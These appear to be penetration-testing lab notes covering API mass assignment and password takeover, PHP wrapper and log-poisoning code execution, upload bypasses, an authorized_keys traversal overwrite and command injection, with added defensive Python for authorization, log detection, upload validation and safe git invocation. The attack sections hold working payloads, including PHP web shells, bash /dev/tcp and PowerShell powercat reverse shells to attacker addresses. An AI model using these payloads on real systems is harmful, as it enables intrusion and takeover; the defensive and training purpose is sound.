Enumerating and Abusing APIs

  1. Create a pattern file containing the API patterns below for fuzzing:

{GOBUSTER}/v1 
{GOBUSTER}/v2 
  2. Then run the gobuster command below for API fuzzing (the ffuf line is the equivalent query):

gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern 
ffuf -c -u http://192.168.50.16:5002/FUZZ/v1 -w /usr/share/wordlists/dirb/big.txt -mc 405 
curl -i http://192.168.50.16:5002/users/v1    ###list users in JSON format
 
###Fuzz for API endpoints under /users/v1/admin/
gobuster dir -u http://192.168.50.16:5002/users/v1/admin/ -w /usr/share/wordlists/dirb/small.txt

###Other common endpoints
curl -i http://192.168.50.16:5002/users/v1/admin/password  ###password endpoint found
curl -i http://192.168.50.16:5002/users/v1/login   ###login endpoint
curl -i http://192.168.50.16:5002/users/v1/register   ###register endpoint
 
###Registering user offsec as an admin 
curl -d '{"password":"lab","username":"offsec","email":"[email protected]","admin":"True"}' -H 'Content-Type: application/json' http://192.168.50.16:5002/users/v1/register 
 
###Log in as the offsec user to grab the auth_token
curl -d '{"password":"lab","username":"offsec"}' -H 'Content-Type: application/json'  http://192.168.50.16:5002/users/v1/login 
 
 
###Changing the admin user's password using the offsec auth_token
curl -X 'PUT' \ 
  'http://192.168.50.16:5002/users/v1/admin/password' \ 
  -H 'Content-Type: application/json' \ 
  -H 'Authorization: OAuth eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDkyNzE3OTQsImlhdCI6MTY0OTI3MTQ5NCwic3ViIjoib2Zmc2VjIn0.OeZH1rEcrZ5F0QqLb8IHbJI7f9KaRAkrywoaRUAsgA4' \ 
  -d '{"password": "pwned"}' 
 
 
###Finally, log in as the admin user
curl -d '{"password":"pwned","username":"admin"}' -H 'Content-Type: application/json'  http://192.168.50.16:5002/users/v1/login 
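The curl sequence above works because the API trusts two things it should decide itself: the `admin` field in the registration body (mass assignment) and the target of the password change, which it never compares against the caller identified by the token (broken object-level authorisation). The following Python is an added example of the server-side checks that close both gaps; it is not the lab API's own code. It assumes the token is an HS256 JWT whose `sub` claim is the username, which is what the token shown above decodes to; the secret, field names and route are constructed for the example.

```python
"""Server-side checks for the two API weaknesses exercised above.

Added example, not the lab API's code. Assumptions: the token is an HS256 JWT
whose "sub" claim is the username (the layout of the token shown on the page);
EXAMPLE_SECRET and the field names are constructed for this example."""
import base64
import hashlib
import hmac
import json
import time

# The only fields a client may supply at registration. "admin" is not one of
# them, so it can never be bound onto the stored user from the request body.
REGISTRATION_FIELDS = frozenset({"username", "password", "email"})

EXAMPLE_SECRET = b"constructed-example-secret"  # constructed; real apps load this from config


class RequestRejected(Exception):
    """Raised for any request the API must refuse with a 4xx."""


def sanitize_registration(body):
    """Return the fields to store, or raise if the body has extra or missing keys."""
    keys = set(body)
    extra = keys - REGISTRATION_FIELDS
    if extra:
        raise RequestRejected(f"unexpected fields: {sorted(extra)}")
    missing = REGISTRATION_FIELDS - keys
    if missing:
        raise RequestRejected(f"missing fields: {sorted(missing)}")
    # Privilege is decided server-side; a self-registered account is never an admin.
    return {**body, "admin": False}


def _b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def make_token(subject, secret, now, lifetime=300):
    """Issue an HS256 JWT for the login endpoint (same shape as the token above)."""
    header = _b64url_encode(json.dumps({"typ": "JWT", "alg": "HS256"}).encode())
    payload = _b64url_encode(json.dumps(
        {"exp": int(now) + lifetime, "iat": int(now), "sub": subject}).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"


def verify_token(token, secret, now=None):
    """Verify signature, algorithm and expiry; return the token's subject."""
    parts = token.split(".")
    if len(parts) != 3:
        raise RequestRejected("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
        payload = json.loads(_b64url_decode(payload_b64))
        signature = _b64url_decode(sig_b64)
    except ValueError:
        raise RequestRejected("malformed token")
    if header.get("alg") != "HS256":  # pin the algorithm instead of trusting the header
        raise RequestRejected("unexpected alg")
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        raise RequestRejected("bad signature")
    now = time.time() if now is None else now
    if payload.get("exp", 0) <= now:
        raise RequestRejected("token expired")
    if "sub" not in payload:
        raise RequestRejected("token has no subject")
    return payload["sub"]


def authorize_password_change(token, target_user, secret, is_admin, now=None):
    """Object-level check for PUT /users/v1/<target_user>/password.

    The caller may change its own password; only an administrator, as decided by
    the server-side is_admin lookup and never by the request, may change another
    user's. Returns the authenticated subject when the change is permitted."""
    subject = verify_token(token, secret, now)
    if subject != target_user and not is_admin(subject):
        raise RequestRejected(f"{subject} may not change the password of {target_user}")
    return subject
```

With these checks in place the registration call above creates a non-admin account regardless of the body, and the PUT with the offsec token is refused before any password is touched.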

http://192.168.208.16:5002/users/v1/login
http://192.168.208.16:5002/users/v1/register

###PHP data:// wrapper (only works when allow_url_include is On)
data://text/plain,<?php phpinfo();?>
 
echo -n '<?php echo system($_GET["cmd"]);?>' | base64 
 
curl "http://example.com/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"

Log Poisoning

###LFI already found in 'page' parameter 
?page=../../../../../../../../../var/log/apache2/access.log    ###apache log file path 
 
###Steps to perform the attack:
1. Capture request of: http://192.168.208.16/meteor/index.php?page=admin.php 
2. Change User-Agent value to: <?php echo system($_GET['cmd']); ?> 
3. Execute Command: ?page=../../../../../../../../../var/log/apache2/access.log&cmd=<COMMAND> 
 
###Gaining a shell (Note: the bash one-liner reverse shell must be URL-encoded)
?page=../../../../../../../../../var/log/apache2/access.log&cmd=bash -c "bash -i >& /dev/tcp/AttackerIP/4444 0>&1" 
 
 
#####WINDOWS (PATH: C:\xampp\apache\logs\access.log) 
1. Capture request of: http://192.168.208.16/meteor/index.php?page=admin.php 
2. Change User-Agent value to: <?php echo system($_GET['cmd']); ?> 
3. http://192.168.208.193/meteor/index.php?page=../../apache/logs/access.log&cmd=<COMMAND> 
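Both halves of the log-poisoning chain above leave distinctive traces in the same access log that gets poisoned: a User-Agent carrying a PHP open tag, followed by a `page` parameter that traverses into the log file. The Python below is an added detection example that runs over Apache "combined" log lines and reports a client that did both; it is not from the original page. The log lines are constructed for the example, not captured from the lab.

```python
"""Detection for the log-poisoning chain described above, over Apache
'combined' access-log lines. Added example; SAMPLE_LOG is constructed."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
TRAVERSAL = re.compile(r"(?:\.\./|\.\.\\)")
LOG_FILES = ("access.log", "error.log", "access_log", "error_log")

# Constructed log lines: one benign request, then the two steps of the chain.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Apr/2022:10:00:01 +0000] "GET /meteor/index.php?page=admin.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [07/Apr/2022:10:00:05 +0000] "GET /meteor/index.php?page=admin.php HTTP/1.1" 200 512 "-" "<?php echo system($_GET[\'cmd\']); ?>"',
    '192.0.2.10 - - [07/Apr/2022:10:00:09 +0000] "GET /meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9812 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def classify(rec):
    """Return the detection labels for one parsed record, in the order found."""
    labels = []
    # Apache writes embedded quotes in the UA as \" so undo that before matching.
    ua = rec["ua"].replace('\\"', '"')
    if PHP_OPEN_TAG.search(ua):
        labels.append("php_tag_in_user_agent")
    query = urlsplit(rec["target"]).query
    for values in parse_qs(query, keep_blank_values=True).values():
        for value in values:
            decoded = unquote(unquote(value))  # also undo double URL encoding
            if TRAVERSAL.search(decoded):
                labels.append("path_traversal_in_parameter")
                if any(name in decoded.lower() for name in LOG_FILES):
                    labels.append("log_file_inclusion")
    return labels


def findings(lines):
    """Map each client IP to its sorted labels; flag the chain when both halves appear."""
    per_ip = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        per_ip[rec["ip"]].update(classify(rec))
    for labels in per_ip.values():
        if {"php_tag_in_user_agent", "log_file_inclusion"} <= labels:
            labels.add("log_poisoning_chain")
    return {ip: sorted(labels) for ip, labels in per_ip.items() if labels}


if __name__ == "__main__":
    for ip, labels in findings(SAMPLE_LOG).items():
        print(ip, labels)
```

The Windows variant (`../../apache/logs/access.log`) is caught by the same rule because the match is on the traversal sequence plus the log file name, not on the Linux path. Correlating per client matters: a PHP tag in a User-Agent on its own is noisy, but the same address then including the log file is a high-confidence signal.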

File Upload Vulnerabilities

Other Methods to upload file: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files

[+] Simple file upload: Upload malicious file > Find path where it uploaded > Execute it

Simple Bypass (Extension modification)

PHP Code: <?php echo system($_GET['cmd']); ?>

  1. Capture the malicious file upload request in Burp Suite.

  2. Change the extension to .pHP, .php5, .phtml etc., set the Content-Type header to application/x-php, and upload the file.

  3. Execute the file.

Non-Executable File Abuse

  1. First generate the SSH keys with ssh-keygen.

  2. Write the content of the .pub file into authorized_keys with this command: cat <filename>.pub > authorized_keys

Note: delete ~/.ssh/known_hosts (rm ~/.ssh/known_hosts) to avoid a host key error.

  3. Upload the authorized_keys file and capture the upload request in Burp Suite.

  4. Change the filename to ../../../../../../root/.ssh/authorized_keys

  5. Lastly, log in via SSH using the private key: ssh <user>@$IP -i id_rsa
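Both upload tricks above, the extension-variant bypass with a forged Content-Type and the traversal filename that lands authorized_keys in /root/.ssh, succeed against the same weak handler: one that trusts the client's filename and header. The Python below is an added example of upload validation that refuses both; it is not the lab application's code. The upload directory, the extension allowlist and the magic-byte table are assumptions chosen for the example.

```python
"""Upload validation that defeats the extension bypass and the traversal
filename shown above. Added example; ALLOWED_EXTENSIONS, MAGIC and the
upload directory used by callers are assumptions for this example."""
import os
import secrets

# Extensions the application actually needs. An allowlist is safer than a
# blocklist that has to enumerate every PHP handler variant (.pHP, .php5, ...).
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf"}
# Server-side script extensions refused anywhere in the name, including as an
# inner extension such as shell.php.png.
SERVER_SIDE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps", "pht"}
# Leading bytes of the permitted formats; the client's Content-Type header is never consulted.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}


class UploadRejected(Exception):
    """Raised for any upload the handler must refuse."""


def check_filename(filename):
    """Return the lowercase extension of an acceptable client filename, or raise."""
    # Any directory component (../ or ..\) means the client is choosing the path;
    # a leading dot refuses dotfiles such as .htaccess that change handler behaviour.
    if filename != os.path.basename(filename) or "\\" in filename or filename.startswith("."):
        raise UploadRejected("filename must be a bare name")
    parts = filename.lower().split(".")
    if len(parts) < 2 or not all(parts):
        raise UploadRejected("missing or empty extension")
    exts = parts[1:]
    if any(ext in SERVER_SIDE_EXTENSIONS for ext in exts):
        raise UploadRejected("server-side script extension refused")
    if exts[-1] not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension {exts[-1]!r} not allowed")
    return exts[-1]


def check_content(ext, data):
    """Confirm the bytes start like the format the extension claims."""
    if not any(data.startswith(sig) for sig in MAGIC[ext]):
        raise UploadRejected(f"content does not match {ext}")


def stored_path(upload_dir, filename, data):
    """Validate the upload and return the server-chosen path it would be written to.

    The stored name is random, so the client's filename never reaches the
    filesystem, and the resolved path is checked to lie inside upload_dir."""
    ext = check_filename(filename)
    check_content(ext, data)
    target = os.path.join(upload_dir, f"{secrets.token_hex(16)}.{ext}")
    root = os.path.realpath(upload_dir)
    if os.path.commonpath([root, os.path.realpath(target)]) != root:
        raise UploadRejected("resolved path escapes upload directory")
    return target
```

Serving the upload directory with script execution disabled (no PHP handler, no .htaccess overrides) is the second layer; the validation above is what stops the file from landing somewhere the server will run it or SSH will read it.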

Command Injection

[+] Snippet for checking whether our commands are executed by PowerShell or CMD

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell 
archive=https://github.com/projectdiscovery/subfinder.git%3bipconfig 

bash -c "bash -i >& /dev/tcp/192.168.45.246/9001 0>&1"

../../apache/logs/access.log

IEX (New-Object Net.WebClient).DownloadString('http://192.168.45.246:8888/powercat.ps1');powercat -c 192.168.45.246 -p 9001 -e powershell
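The `archive=...subfinder.git%3bipconfig` case above works because the application splices a client-supplied URL into a shell command line, so a URL-encoded `;` becomes a command separator. The Python below is an added example of the fix on the server side, not the lab application's code: validate the value against a strict shape and pass it to git as an argument list, never through a shell. The accepted hosts are an assumption for the example.

```python
"""Hardening for the command-injection case above. Added example; ALLOWED_HOSTS
is an assumption about which hosts the application legitimately clones from."""
import re
import shlex
from urllib.parse import urlsplit

# Only an https clone of a plain owner/repo.git path is accepted.
REPO_PATH = re.compile(r"^/[A-Za-z0-9._-]+/[A-Za-z0-9._-]+\.git$")
ALLOWED_HOSTS = {"github.com", "gitlab.com"}  # assumption for the example
SHELL_META = set(";|&$`<>(){}'\"\\ \t\n\r")


class InvalidRepoUrl(ValueError):
    """Raised when the value is not a permitted clone target."""


def validate_repo_url(value):
    """Return the value unchanged if it is a safe clone URL, else raise InvalidRepoUrl.

    The metacharacter check is defence in depth: the argv-based invocation in
    clone_argv already makes ';' plain data, but rejecting it keeps odd input
    out of logs and downstream tooling."""
    if any(ch in SHELL_META or ord(ch) < 0x20 for ch in value):
        raise InvalidRepoUrl("shell metacharacter, whitespace or control byte in URL")
    parts = urlsplit(value)
    if parts.scheme != "https":
        raise InvalidRepoUrl("only https:// is accepted")  # also refuses file://, ssh://, ext::
    if parts.hostname not in ALLOWED_HOSTS or parts.port is not None or parts.username:
        raise InvalidRepoUrl("host not allowed")
    if parts.query or parts.fragment or not REPO_PATH.match(parts.path):
        raise InvalidRepoUrl("unexpected path")
    return value


def clone_argv(value, dest_dir):
    """Build the git command as an argv list for subprocess.run(argv) with shell=False."""
    url = validate_repo_url(value)
    # '--' stops git from treating a URL that begins with '-' as an option.
    return ["git", "clone", "--depth", "1", "--", url, dest_dir]


def rendered(argv):
    """Shell-quoted rendering of argv for audit logs, showing exactly what would run."""
    return " ".join(shlex.quote(a) for a in argv)
```

The encoded form `%3b` is rejected as well, even before decoding, because it does not fit the `owner/repo.git` path shape; the allowlist does the work and the metacharacter check only adds a second, independent reason to refuse.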
